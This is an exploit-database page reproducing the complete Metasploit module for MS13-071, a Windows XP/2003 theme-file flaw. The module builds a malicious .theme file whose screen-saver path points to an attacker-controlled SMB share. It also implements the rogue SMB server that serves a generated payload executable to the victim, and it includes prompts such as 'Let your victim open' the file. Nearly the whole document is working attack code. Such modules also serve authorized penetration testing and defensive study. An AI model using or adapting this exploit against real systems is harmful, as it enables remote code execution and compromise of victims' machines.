0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
MS13-071 Microsoft Windows Theme File Handling Code Execution
Author
Risk
[
Security Risk High
]0day-ID
Category
Date add
CVE
Platform
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::EXE include Msf::Exploit::Remote::SMBServer def initialize(info={}) super(update_info(info, 'Name' => "MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution", 'Description' => %q{ This module exploits a vulnerability mainly affecting Microsoft Windows XP and Windows 2003. The vulnerability exists in the handling of the Screen Saver path, in the [boot] section. An arbitrary path can be used as screen saver, including a remote SMB resource, which allows for remote code execution when a malicious .theme file is opened, and the "Screen Saver" tab is viewed. }, 'License' => MSF_LICENSE, 'Author' => [ 'Eduardo Prado', # Vulnerability discovery 'juan vazquez' # Metasploit module ], 'References' => [ ['CVE', '2013-0810'], ['OSVDB', '97136'], ['MSB', 'MS13-071'], ['BID', '62176'] ], 'Payload' => { 'Space' => 2048, 'DisableNops' => true }, 'DefaultOptions' => { 'DisablePayloadHandler' => 'false' }, 'Platform' => 'win', 'Targets' => [ ['Windows XP SP3 / Windows 2003 SP2', {}], ], 'Privileged' => false, 'DisclosureDate' => "Sep 10 2013", 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [true, 'The theme file', 'msf.theme']), OptString.new('UNCPATH', [ false, 'Override the UNC path to use (Ex: \\\\192.168.1.1\\share\\exploit.scr)' ]) ], self.class) end def exploit if (datastore['UNCPATH']) @unc = datastore['UNCPATH'] print_status("Remember to share the malicious EXE payload as #{@unc}") else print_status("Generating our malicious executable...") @exe = generate_payload_exe my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST'] @share = rand_text_alpha(5 + rand(5)) @scr_file = "#{rand_text_alpha(5 + rand(5))}.scr" @hi, @lo = UTILS.time_unix_to_smb(Time.now.to_i) @unc = "\\\\#{my_host}\\#{@share}\\#{@scr_file}" end print_status("Creating '#{datastore['FILENAME']}' file ...") # Default Windows XP / 2003 theme modified theme = <<-EOF ; Copyright © Microsoft Corp. 1995-2001 [Theme] DisplayName=@themeui.dll,-2016 ; My Computer [CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\DefaultIcon] DefaultValue=%WinDir%explorer.exe,0 ; My Documents [CLSID\\{450D8FBA-AD25-11D0-98A8-0800361B1103}\\DefaultIcon] DefaultValue=%WinDir%SYSTEM32\\mydocs.dll,0 ; My Network Places [CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\DefaultIcon] DefaultValue=%WinDir%SYSTEM32\\shell32.dll,17 ; Recycle Bin [CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\DefaultIcon] full=%WinDir%SYSTEM32\\shell32.dll,32 empty=%WinDir%SYSTEM32\\shell32.dll,31 [Control Panel\\Desktop] Wallpaper= TileWallpaper=0 WallpaperStyle=2 Pattern= ScreenSaveActive=0 [boot] SCRNSAVE.EXE=#{@unc} [MasterThemeSelector] MTSM=DABJDKT EOF file_create(theme) print_good("Let your victim open #{datastore['FILENAME']}") if not datastore['UNCPATH'] print_status("Ready to deliver your payload on #{@unc}") super end end # TODO: these smb_* methods should be moved up to the SMBServer mixin # development and test on progress def smb_cmd_dispatch(cmd, c, buff) smb = @state[c] vprint_status("Received command #{cmd} from #{smb[:name]}") pkt = CONST::SMB_BASE_PKT.make_struct pkt.from_s(buff) #Record the IDs smb[:process_id] = pkt['Payload']['SMB'].v['ProcessID'] smb[:user_id] = pkt['Payload']['SMB'].v['UserID'] smb[:tree_id] = pkt['Payload']['SMB'].v['TreeID'] smb[:multiplex_id] = pkt['Payload']['SMB'].v['MultiplexID'] case cmd when CONST::SMB_COM_NEGOTIATE smb_cmd_negotiate(c, buff) when CONST::SMB_COM_SESSION_SETUP_ANDX wordcount = pkt['Payload']['SMB'].v['WordCount'] if wordcount == 0x0D # It's the case for Share Security Mode sessions smb_cmd_session_setup(c, buff) else vprint_status("SMB Capture - #{smb[:ip]} Unknown SMB_COM_SESSION_SETUP_ANDX request type , ignoring... ") smb_error(cmd, c, CONST::SMB_STATUS_SUCCESS) end when CONST::SMB_COM_TRANSACTION2 smb_cmd_trans(c, buff) when CONST::SMB_COM_NT_CREATE_ANDX smb_cmd_create(c, buff) when CONST::SMB_COM_READ_ANDX smb_cmd_read(c, buff) else vprint_status("SMB Capture - Ignoring request from #{smb[:name]} - #{smb[:ip]} (#{cmd})") smb_error(cmd, c, CONST::SMB_STATUS_SUCCESS) end end def smb_cmd_negotiate(c, buff) pkt = CONST::SMB_NEG_PKT.make_struct pkt.from_s(buff) dialects = pkt['Payload'].v['Payload'].gsub(/\x00/, '').split(/\x02/).grep(/^\w+/) dialect = dialects.index("NT LM 0.12") || dialects.length-1 pkt = CONST::SMB_NEG_RES_NT_PKT.make_struct smb_set_defaults(c, pkt) time_hi, time_lo = UTILS.time_unix_to_smb(Time.now.to_i) pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NEGOTIATE pkt['Payload']['SMB'].v['Flags1'] = 0x88 pkt['Payload']['SMB'].v['Flags2'] = 0xc001 pkt['Payload']['SMB'].v['WordCount'] = 17 pkt['Payload'].v['Dialect'] = dialect pkt['Payload'].v['SecurityMode'] = 2 # SHARE Security Mode pkt['Payload'].v['MaxMPX'] = 50 pkt['Payload'].v['MaxVCS'] = 1 pkt['Payload'].v['MaxBuff'] = 4356 pkt['Payload'].v['MaxRaw'] = 65536 pkt['Payload'].v['SystemTimeLow'] = time_lo pkt['Payload'].v['SystemTimeHigh'] = time_hi pkt['Payload'].v['ServerTimeZone'] = 0x0 pkt['Payload'].v['SessionKey'] = 0 pkt['Payload'].v['Capabilities'] = 0x80f3fd pkt['Payload'].v['KeyLength'] = 8 pkt['Payload'].v['Payload'] = Rex::Text.rand_text_hex(8) c.put(pkt.to_s) end def smb_cmd_session_setup(c, buff) pkt = CONST::SMB_SETUP_RES_PKT.make_struct smb_set_defaults(c, pkt) pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_SESSION_SETUP_ANDX pkt['Payload']['SMB'].v['Flags1'] = 0x88 pkt['Payload']['SMB'].v['Flags2'] = 0xc001 pkt['Payload']['SMB'].v['WordCount'] = 3 pkt['Payload'].v['AndX'] = 0x75 pkt['Payload'].v['Reserved1'] = 00 pkt['Payload'].v['AndXOffset'] = 96 pkt['Payload'].v['Action'] = 0x1 # Logged in as Guest pkt['Payload'].v['Payload'] = Rex::Text.to_unicode("Unix", 'utf-16be') + "\x00\x00" + # Native OS # Samba signature Rex::Text.to_unicode("Samba 3.4.7", 'utf-16be') + "\x00\x00" + # Native LAN Manager # Samba signature Rex::Text.to_unicode("WORKGROUP", 'utf-16be') + "\x00\x00\x00" + # Primary DOMAIN # Samba signature tree_connect_response = "" tree_connect_response << [7].pack("C") # Tree Connect Response : WordCount tree_connect_response << [0xff].pack("C") # Tree Connect Response : AndXCommand tree_connect_response << [0].pack("C") # Tree Connect Response : Reserved tree_connect_response << [0].pack("v") # Tree Connect Response : AndXOffset tree_connect_response << [0x1].pack("v") # Tree Connect Response : Optional Support tree_connect_response << [0xa9].pack("v") # Tree Connect Response : Word Parameter tree_connect_response << [0x12].pack("v") # Tree Connect Response : Word Parameter tree_connect_response << [0].pack("v") # Tree Connect Response : Word Parameter tree_connect_response << [0].pack("v") # Tree Connect Response : Word Parameter tree_connect_response << [13].pack("v") # Tree Connect Response : ByteCount tree_connect_response << "A:\x00" # Service tree_connect_response << "#{Rex::Text.to_unicode("NTFS")}\x00\x00" # Extra byte parameters # Fix the Netbios Session Service Message Length # to have into account the tree_connect_response, # need to do this because there isn't support for # AndX still my_pkt = pkt.to_s + tree_connect_response original_length = my_pkt[2, 2].unpack("n").first original_length = original_length + tree_connect_response.length my_pkt[2, 2] = [original_length].pack("n") c.put(my_pkt) end def smb_cmd_create(c, buff) pkt = CONST::SMB_CREATE_PKT.make_struct pkt.from_s(buff) if pkt['Payload'].v['Payload'] =~ /#{Rex::Text.to_unicode("#{@scr_file}\x00")}/ pkt = CONST::SMB_CREATE_RES_PKT.make_struct smb_set_defaults(c, pkt) pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_CREATE_ANDX pkt['Payload']['SMB'].v['Flags1'] = 0x88 pkt['Payload']['SMB'].v['Flags2'] = 0xc001 pkt['Payload']['SMB'].v['WordCount'] = 42 pkt['Payload'].v['AndX'] = 0xff # no further commands pkt['Payload'].v['OpLock'] = 0x2 # No need to track fid here, we're just offering one file pkt['Payload'].v['FileID'] = rand(0x7fff) + 1 # To avoid fid = 0 pkt['Payload'].v['Action'] = 0x1 # The file existed and was opened pkt['Payload'].v['CreateTimeLow'] = @lo pkt['Payload'].v['CreateTimeHigh'] = @hi pkt['Payload'].v['AccessTimeLow'] = @lo pkt['Payload'].v['AccessTimeHigh'] = @hi pkt['Payload'].v['WriteTimeLow'] = @lo pkt['Payload'].v['WriteTimeHigh'] = @hi pkt['Payload'].v['ChangeTimeLow'] = @lo pkt['Payload'].v['ChangeTimeHigh'] = @hi pkt['Payload'].v['Attributes'] = 0x80 # Ordinary file pkt['Payload'].v['AllocLow'] = 0x100000 pkt['Payload'].v['AllocHigh'] = 0 pkt['Payload'].v['EOFLow'] = @exe.length pkt['Payload'].v['EOFHigh'] = 0 pkt['Payload'].v['FileType'] = 0 pkt['Payload'].v['IPCState'] = 0x7 pkt['Payload'].v['IsDirectory'] = 0 c.put(pkt.to_s) else pkt = CONST::SMB_CREATE_RES_PKT.make_struct smb_set_defaults(c, pkt) pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_CREATE_ANDX pkt['Payload']['SMB'].v['ErrorClass'] = 0xC0000034 # OBJECT_NAME_NOT_FOUND pkt['Payload']['SMB'].v['Flags1'] = 0x88 pkt['Payload']['SMB'].v['Flags2'] = 0xc001 c.put(pkt.to_s) end end def smb_cmd_read(c, buff) pkt = CONST::SMB_READ_PKT.make_struct pkt.from_s(buff) offset = pkt['Payload'].v['Offset'] length = pkt['Payload'].v['MaxCountLow'] pkt = CONST::SMB_READ_RES_PKT.make_struct smb_set_defaults(c, pkt) pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_READ_ANDX pkt['Payload']['SMB'].v['Flags1'] = 0x88 pkt['Payload']['SMB'].v['Flags2'] = 0xc001 pkt['Payload']['SMB'].v['WordCount'] = 12 pkt['Payload'].v['AndX'] = 0xff # no more commands pkt['Payload'].v['Remaining'] = 0xffff pkt['Payload'].v['DataLenLow'] = length pkt['Payload'].v['DataOffset'] = 59 pkt['Payload'].v['DataLenHigh'] = 0 pkt['Payload'].v['Reserved3'] = 0 pkt['Payload'].v['Reserved4'] = 6 pkt['Payload'].v['ByteCount'] = length pkt['Payload'].v['Payload'] = @exe[offset, length] c.put(pkt.to_s) end def smb_cmd_trans(c, buff) pkt = CONST::SMB_TRANS2_PKT.make_struct pkt.from_s(buff) sub_command = pkt['Payload'].v['SetupData'].unpack("v").first case sub_command when 0x5 # QUERY_PATH_INFO smb_cmd_trans_query_path_info(c, buff) when 0x1 # FIND_FIRST2 smb_cmd_trans_find_first2(c, buff) else pkt = CONST::SMB_TRANS_RES_PKT.make_struct smb_set_defaults(c, pkt) pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2 pkt['Payload']['SMB'].v['Flags1'] = 0x88 pkt['Payload']['SMB'].v['Flags2'] = 0xc001 pkt['Payload']['SMB'].v['ErrorClass'] = 0xc0000225 # NT_STATUS_NOT_FOUND c.put(pkt.to_s) end end def smb_cmd_trans_query_path_info(c, buff) pkt = CONST::SMB_TRANS2_PKT.make_struct pkt.from_s(buff) if pkt['Payload'].v['SetupData'].length < 16 # if QUERY_PATH_INFO_PARAMETERS doesn't include a file name, # return a Directory answer pkt = CONST::SMB_TRANS_RES_PKT.make_struct smb_set_defaults(c, pkt) pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2 pkt['Payload']['SMB'].v['Flags1'] = 0x88 pkt['Payload']['SMB'].v['Flags2'] = 0xc001 pkt['Payload']['SMB'].v['WordCount'] = 10 pkt['Payload'].v['ParamCountTotal'] = 2 pkt['Payload'].v['DataCountTotal'] = 40 pkt['Payload'].v['ParamCount'] = 2 pkt['Payload'].v['ParamOffset'] = 56 pkt['Payload'].v['DataCount'] = 40 pkt['Payload'].v['DataOffset'] = 60 pkt['Payload'].v['Payload'] = "\x00" + # Padding # QUERY_PATH_INFO Parameters "\x00\x00" + # EA Error Offset "\x00\x00" + # Padding #QUERY_PATH_INFO Data [@lo, @hi].pack("VV") + # Created [@lo, @hi].pack("VV") + # Last Access [@lo, @hi].pack("VV") + # Last Write [@lo, @hi].pack("VV") + # Change "\x10\x00\x00\x00" + # File attributes => directory "\x00\x00\x00\x00" # Unknown c.put(pkt.to_s) else # if QUERY_PATH_INFO_PARAMETERS includes a file name, # returns an object name not found error pkt = CONST::SMB_TRANS_RES_PKT.make_struct smb_set_defaults(c, pkt) pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2 pkt['Payload']['SMB'].v['ErrorClass'] = 0xC0000034 #OBJECT_NAME_NOT_FOUND pkt['Payload']['SMB'].v['Flags1'] = 0x88 pkt['Payload']['SMB'].v['Flags2'] = 0xc001 c.put(pkt.to_s) end end def smb_cmd_trans_find_first2(c, buff) pkt = CONST::SMB_TRANS_RES_PKT.make_struct smb_set_defaults(c, pkt) file_name = Rex::Text.to_unicode(@scr_file) pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2 pkt['Payload']['SMB'].v['Flags1'] = 0x88 pkt['Payload']['SMB'].v['Flags2'] = 0xc001 pkt['Payload']['SMB'].v['WordCount'] = 10 pkt['Payload'].v['ParamCountTotal'] = 10 pkt['Payload'].v['DataCountTotal'] = 94 + file_name.length pkt['Payload'].v['ParamCount'] = 10 pkt['Payload'].v['ParamOffset'] = 56 pkt['Payload'].v['DataCount'] = 94 + file_name.length pkt['Payload'].v['DataOffset'] = 68 pkt['Payload'].v['Payload'] = "\x00" + # Padding # FIND_FIRST2 Parameters "\xfd\xff" + # Search ID "\x01\x00" + # Search count "\x01\x00" + # End Of Search "\x00\x00" + # EA Error Offset "\x00\x00" + # Last Name Offset "\x00\x00" + # Padding #QUERY_PATH_INFO Data [94 + file_name.length].pack("V") + # Next Entry Offset "\x00\x00\x00\x00" + # File Index [@lo, @hi].pack("VV") + # Created [@lo, @hi].pack("VV") + # Last Access [@lo, @hi].pack("VV") + # Last Write [@lo, @hi].pack("VV") + # Change [@exe.length].pack("V") + "\x00\x00\x00\x00" + # End Of File "\x00\x00\x10\x00\x00\x00\x00\x00" + # Allocation size "\x80\x00\x00\x00" + # File attributes => directory [file_name.length].pack("V") + # File name len "\x00\x00\x00\x00" + # EA List Lenght "\x00" + # Short file lenght "\x00" + # Reserved ("\x00" * 24) + file_name c.put(pkt.to_s) end end # 0day.today [2024-12-24] #